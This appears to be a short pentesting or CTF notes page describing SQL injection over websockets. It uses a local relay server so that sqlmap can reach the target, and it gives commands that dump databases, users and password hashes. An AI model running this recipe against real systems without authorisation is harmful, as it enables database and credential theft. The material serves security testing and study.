34 lines
1.3 KiB
Markdown
34 lines
1.3 KiB
Markdown
# Websocket SQLi
|
|
|
|
* SQLmap is not able to send websocket requests directly because of the id added to the request. Therefore you need a local webserver as a middleware which translates requests to the target. Put in the webserver URL, and the correct data structure into the script and run it.o
|
|
|
|
```sh
|
|
sqlmap -u "http://127.0.0.1:8081/?id=62009" -p "id" --dbs
|
|
```
|
|
|
|
## Usage
|
|
|
|
First, make sure ` websocket-client` is installed from PyPi.
|
|
|
|
Enumerate the websocket via [the websocket enumeration script](../../Enumeration/EnumScripts).
|
|
You may provide the URL endpoint you want to request and the key, value of the request via the arguments in the following way
|
|
```sh
|
|
websocket_enumeration.py /values key value
|
|
```
|
|
|
|
I modified the script rayhan0x01 provides so that an endpoint can set. [The modified script](./Scripts/sqlmap_websocket_server.py) is started in the following way
|
|
```sh
|
|
sqlmap_websocket_server.py /endpoint
|
|
```
|
|
|
|
Start sqlmap requesting the `sqlmap_websocket_server` on localhost port 8081
|
|
```sh
|
|
sqlmap -u "http://127.0.0.1:8081/?id=1" --batch --risk 3 --level 5 --flush-session --dump --passwords --users
|
|
```
|
|
|
|
## References
|
|
|
|
* [rayhan0x01's git repo](https://github.com/rayhan0x01/nodejs-websocket-sqli)
|
|
* [rayhan0x01's blog entry](https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html)
|
|
|